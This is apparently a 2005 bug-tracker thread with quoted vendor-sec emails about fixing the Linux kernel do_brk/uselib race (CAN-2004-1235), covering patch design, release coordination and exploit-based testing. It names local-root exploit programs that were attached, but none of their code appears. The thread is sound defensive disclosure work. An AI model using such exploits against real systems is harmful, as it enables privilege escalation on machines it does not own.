as the following patch I can prepare a v2.6 patch. | | OK... | | I'm a bit concerned that do_brk() is, for some reason, exported to modules. | If someone is already taking mmap_sem prior to calling do_brk(), we've | just gone and made them deadlock. | | So I think it would be better to leave do_brk unchanged and to introduce a | new do_brk_unlocked() which takes mmap_sem then calls do_brk. Agreed. OK will prepare a patch. Happy new year folks! _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec Date: Sat, 1 Jan 2005 11:18:56 -0200 From: Marcelo Tosatti <marcelo.tosatti@cyclades.com> To: Andrew Morton <akpm@osdl.org> Cc: ihaquer@isec.pl, bressers@redhat.com, security@isec.pl, vendor-sec@lst.de, solar@openwall.com, chrisw@osdl.org, mjc@redhat.com Subject: Re: [vendor-sec] Merry Christmas User-Agent: Mutt/1.5.5.1i X-Spam-Level: On Sat, Jan 01, 2005 at 11:05:21AM -0200, Marcelo Tosatti wrote: | On Fri, Dec 31, 2004 at 02:36:27PM -0800, Andrew Morton wrote: | > Marcelo Tosatti <marcelo.tosatti@cyclades.com> wrote: | > > | > > Andrew, if you're OK with the addition of lockless __do_brk() and locking do_brk() | > > as the following patch I can prepare a v2.6 patch. | > | > OK... | > | > I'm a bit concerned that do_brk() is, for some reason, exported to modules. | > If someone is already taking mmap_sem prior to calling do_brk(), we've | > just gone and made them deadlock. | > | > So I think it would be better to leave do_brk unchanged and to introduce a | > new do_brk_unlocked() which takes mmap_sem then calls do_brk. | | Agreed. OK will prepare a patch. | | Happy new year folks! It would be important for us to agree on a date for release of the patches, so vendors can be synchronize and prepare their udpdates. What about January 7 or 8? _______________________________________________ Vendor Security mailing list Vendor Security@lst.de https://www.lst.de/cgi-bin/mailman/listinfo/vendor-sec
Created attachment 27353 [details] mail with proposed patch from marcello as attachment
ok the bug is clear now, it was do_brk and not do_mmap (I only looked at mmap last time I checked the code, and mmap was fine). I'll audit Marcelo's patch on top of our tree and I'll port to 2.6.
Judging from Marcelos response to Andrews comment it's not the final patch yet.
I agree with Andrew too, I mean I was going to audit and fix it those bits (and potentially more since I'm going to audit all do_brk callers again) and attach it here.
Created attachment 27368 [details] do brk race fix for SLES8 from 2.4 CVS HEAD
Created attachment 27369 [details] do brk race fix for 2.6 CVS HEAD
Created attachment 27370 [details] do brk race fix for 2.6 CVS HEAD (the previous one had a leftover that I had to apply to be able to compile it)
Created attachment 27371 [details] do brk race fix for 2.6 CVS SL9.2
Created attachment 27372 [details] do brk race fix for 2.6 CVS SLES9 SP1 branch and CVS SLES9 GA branch
I didn't apply to CVS myself since I don't know the exact CVS procedures to handle security sensitive info coming from vendor-sec.
* This comment was added by mail. Date: Mon, 3 Jan 2005 18:42:26 -0200 From: Marcelo Tosatti <marcelo.tosatti@cyclades.com> To: vendor-sec@lst.de Cc: Andrew Morton <akpm@osdl.org>, solar@openwall.com, chrisw@osdl.org, ihaquer@isec.pl Subject: Re: [vendor-sec] Merry Christmas On Mon, Jan 03, 2005 at 02:31:50PM -0200, Marcelo Tosatti wrote: | On Mon, Jan 03, 2005 at 06:12:00PM +0100, Martin Pitt wrote: | > Hi! | > | > Marcelo Tosatti [2005-01-01 11:18 -0200]: | > > It would be important for us to agree on a date for release of the patches, | > > so vendors can be synchronize and prepare their udpdates. | > > | > > What about January 7 or 8? | > | > Just a suggestion, maybe a release date should be set _after_ patches | > for both 2.4 and 2.6 are available? Otherwise it does not make much | > sense. | > | > Happy new year! | | Yep! I'll be sending out tested patches in a couple of hours, we can then | settle the date down, OK? Here they are - I haven't been able to run the exploit with success on v2.6.10 - it segfaults earlier than expected on mmap2 - maybe its my compiler. Someone please test the following patch on v2.6. v2.6.10-mm1 oops on my face (during console related routines) with or without the fix. The v2.4 version has been tested with success and does stop the exploit. Kudos to Paul Starzetz for finding this!
Created attachment 27375 [details] 2.4.28-diff-brk.patch from Marcello
Created attachment 27376 [details] 2.6.10-mm1-brk-locked.patch from Marcello
CAN-2004-1235
can we agree on final patches already?
Created attachment 27380 [details] love_krove.gif.xx exploit program for i386 from Paul
apparently Marcelo called it locked, while I called it _unlocked as suggested by Andrew. I trust my code more since I audited all do_brk calls, so I prefer that we apply my patches, they required rediffing due rejects anyway. For example my 2.4 version has been written specifically for SLES8 while Marcelo's version would miss binfmt_coff.c. So Marcelo's attachment is a no-way for SUSE kernels, perhaps it could only be applied to 2.6 CVS HEAD, all other trees required re-auditing and different patches, that I already attached to this bugzilla.
Do we have final fixes here? It appears Linus did not like Marcellos approach and wanted to do something different.
I've seen a complaint about the _locked name, but I actually called it _unlocked. The other comments about not needing the semaphore around most of them are just PR stuff, in real life this is needed and I'd be surprised if mainline won't apply all the semaphores too, to avoid possible future mistakes, like the current one in uselib(). So my patches should be ok and they'll be the only ones applying cleanly to the SUSE trees.
ralf needs a suggestion on whether he should merge this fix into his SLES 9 SP1 update kernel. He asks us to get a consensus ;)
can someone please start applying the patches to all branches except the SLES9 - SP1 branch ...
added klaus@atsec.com,smueller@atsec.com.
Has anyone verified the exploit actually works? I cannot say whether this is a fix we absolutely must have or not, that depends on what our partners want. Ignoring this question for a moment, I'd say we _could_ ship with this fix as it's self-contained, and I trust Andrea has checked that there can't be any deadlocks with mmap_sem. Provided it's really a local root hole I think we want to have the fix in the SP1 kernel. It depends a lot on what is more disruptive to our partners - but that is Ralf's call. audit is playing games with mmap_sem in SLES8 so we need to be careful with the patch there...
Created attachment 27510 [details] elflbl_v108.c exploit with fixed /proc/slabinfo parsing for 2.6.
i have tried it , but it failed for me. i have however only a limited testset of machines.
1 reproduce on sles8-i386
I didn't change any API with my fix, and all those places missed the semaphore. I don't think it's risky to apply it. If you want I can make a more strict fix and to only fixup the uselib bug, but I believe the 4 patches I attached to be safer, just to be sure not to forget other semaphores elsewhere. It's just wrong not to take the semaphore even if we're single threaded. The cost of the semaphore when there's cannot be a contention is not measurable.
Created attachment 27534 [details] elflbl_v108_26.c explopit that compiules on 2.6.
i have not yet succeeded to reproduce on 2.6, however this is mostly due to the fact that the vm_area_struct slabinfo entry does not change in the way that the exploit expects. (active_objs and num_objs stay the same value after the begin of the exploit). however, since the code is very similar in 2.4, it is to be considered to be exploitable.
I'm going to apply Andrea's patches to all trees now, so we have something for check in. It can be disabled at any time if somebody is scared...
Ok, fixes have been applied to all trees now. Should I submit kernels into autobuild? Ralf, what about SP1? Since we still have a blocker there, we should fix the sec problem as well IMHO.
Assigning back to meissner to contact me to discuss it.
Ok, we discussed it and I ack it for the SP1 branch.
fixes now released for all release branches.
Created attachment 33137 [details] pwned.c public exploit (download from packetstorm security)
CVE-2004-1235: CVSS v2 Base Score: 6.2 (AV:L/AC:H/Au:N/C:C/I:C/A:C)